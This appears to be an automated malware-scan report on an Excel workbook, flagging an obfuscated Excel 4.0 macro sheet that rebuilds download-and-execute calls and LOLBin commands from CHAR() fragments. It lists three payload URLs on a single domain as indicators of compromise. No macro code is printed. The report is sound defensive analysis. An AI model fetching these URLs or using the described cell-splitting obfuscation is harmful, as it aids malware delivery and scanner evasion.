Verdict: MALICIOUS
Risk Score: 184
Heuristics: 5
- Excel 4.0 macro sheet (1 sheet(s)) [critical; 3 related findings] OOXML_XLM_MACROSHEET: Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
- XLM payload reassembled from CHAR()/split formulas [critical] OOXML_XLM_REASSEMBLED_PAYLOAD: An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL — the de-obfuscated download-and-run kill chain.
- URL reconstructed from XLM cell array (2 URLs) [critical] OOXML_XLM_CELL_ARRAY_URL: Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order, plus FORMULA cell-reference concatenation in token order.
- XLM payload URL string (1 URL) [info] OOXML_XLM_PAYLOAD_URL: An Excel 4.0 (XLM) macro-sheet workbook with download/execute evidence carries a literal http(s) URL stored as an (often UTF-16) string in the shared-string table or a cell. This is the next-stage payload host referenced by the macro download chain (URLDownloadToFile/ShellExecute); surfaced as an IOC.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ubercancellationfeelawsuit.com/.png (Referenced by macro)
  - http://ubercancellationfeelawsuit.com/p.png (Referenced by macro)
  - http://ubercancellationfeelawsuit.com/ (Referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_sheet_00.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 5838 bytes |

SHA-256: 443d8f56ba0263cae9d9e4ea62c56e7866d39308e15628abcb5f916bfa3d3676
Preview script: first 1,000 lines of the extracted script.